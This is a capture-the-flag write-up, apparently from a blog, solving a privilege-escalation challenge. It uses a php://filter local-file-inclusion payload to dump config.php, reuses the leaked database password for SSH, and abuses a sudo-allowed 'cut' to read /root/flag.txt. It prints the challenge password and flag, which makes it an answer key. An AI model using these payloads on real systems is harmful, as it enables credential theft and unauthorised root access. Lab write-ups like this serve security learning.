AUCHALL - [Privesc] - Intro Privesc

You,AUCHALLPrivesc
Back

Challenge Description

Based on the credentials you got from Intro, it's time you escalate your privileges.

Solution

On running the following payload in Intro Web challenge we got credentials

php://filter/convert.base64-encode/resource=config.php

Alt text

On decoding the base64 output we got database credentials

<?php
    $host = "127.0.0.1";
    $user = "the_user";
    $pass = "%as21k.amu2SAVS51";
    $db = "cy243l";
    /*
        In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords. 
        Do ping me once you've changed it.
    */
?>

Credentials

Username: the_user
Password: %as21k.amu2SAVS51

Using those credentials

ssh [email protected] -p PORT

First thing is to run sudo -l

Alt text

We can run /usr/bin/cut as sudo

Go to this site (opens in a new tab)

$ LFILE=/root/flag.txt
$ sudo cut -d "" -f1 "$LFILE"

Alt text

Flag

Flag is dynamic

CY243L{sud0_-l_ftw_w1th_gtf0b1ns_EE3EC9f_6aUR_MPEy}

Writeups 2023 © RootxRAN.